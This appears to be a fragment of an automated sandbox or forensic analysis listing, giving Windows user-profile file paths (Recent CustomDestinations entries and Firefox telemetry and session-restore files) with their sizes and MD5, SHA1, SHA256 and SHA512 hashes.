C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OIV8QMVSG742BN9UIMJK.temp
Filesize7KB
MD527e1c5d6af1a7ad3d468399e6bf2ad64
SHA14db5856e3b8fc288cdab32af1edcec6de236bcbb
SHA2563d235b661f4adac5ef8a8459191e6c2e5649e05b35fcd1dd7f92cc1955cccfa2
SHA512f0bb246864707d633fc4143774127f4ffcf996dfdb67ac9943cf47f962ce8c5cc7ab1ff39b6ca2918e6a3e8c967a27bd8a501d1f1222890826e60aeff3dc60af
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5b5a4b89e472081022329ab16c9b61d02
SHA144ca3f71770c7d140836b2a0599ccc53c875f23b
SHA25635c0e3e07bf64872a1d31f45b1d6f64ba18ad09f4d7e07000dcf9c37bdf105e1
SHA512af4074b464c03a58a66a33b2dca3b2a2fb77a06b82294ef9615d08c69ec32ca1bd87aad42cec939d55f78f0b0ef0514ddfe121111b0e0983c7915d49bc3ac866
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD5396d30a2dca95b413ff99b62870f8e98
SHA119eb3be136aa68423f951b08d0438cdca570efbd
SHA25696982827ad231d99f36b7ab36b24da84ab67a9fd63a2e1920c0c7a84c1dd7c6d
SHA512bd2dc6979419d7d017d9f29a89382cc329a38459823ec8d56f72935e21268b65ec1115f3ec226eabb6ec65c7a10af2021956364d20d3f3f508bac2b7b7beac38
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\7aaebf21-f2a1-4861-9c22-3217ab138a49
Filesize745B
MD52f11096676b181ded9bfcdba538cd812
SHA1366ce83a72e5c092359722bf1e78c887ee1951df
SHA256fba5234718fdd5f90a1c32e53af9eb962730e6166e9adcb9737cf4dce99344aa
SHA512239fb23aa68efaada2eadcecabf3129916693eb409f5b82b5e0d0f95a844ee9622ac33ae1a66d76d24ab30a04953b8c7c3f922cae94ee7defd899068ac1f5efc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\8ab3b727-4dfa-4881-964a-bd2045174fa3
Filesize11KB
MD5d40f0cc98cef88e26ab2af784d74bee4
SHA1c11cb1932dcc30b2145ca39189a78529927f10fd
SHA256e414b6f62e08d1b259f5591a6ce1cb547e6d9cd492370b888a5e4b8f24c2fa18
SHA51274b37a73e42b0dc79914e253eda00b3d92a5368cf83ea44f495fbc56244ae6f2d4f2a755e52a4e2216edb2202864ed0b1455f8d0a2baae7de7d2a8c11db3fbf1
-
Filesize
6KB
MD5c5f494ba2ec33432e3319e4965e7aa53
SHA1f2082970b783c8e8331c5eee7d0473fd6a44f5c3
SHA256c313b8c79c88fe524db769a4743c217b26c96bc514f00694360b609e305cbfe4
SHA51207be5be436c821be4c96db10699703b6306dca5a9278020093f748bb7ead44c9040d4247a1afa42a37024fbc0c7f97f835989154749f23e26918c6e34c28a076
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD5fc6f7215f7abfc0a02f977f594cd7772
SHA12fcb17ad11d639811b779dd06c9dbd77a995fa74
SHA2563858e440154966b22cf2c2d3608b83ff42b12271d09d4aa7b34ba19de216fbda
SHA512dd831df391986f6ee51344bccac79660e506be53fadf68052340cbf049de2755a57098c6def7f5c08f7ded642cb0614726a6ad5bfdea960983ab7c3a72c00a20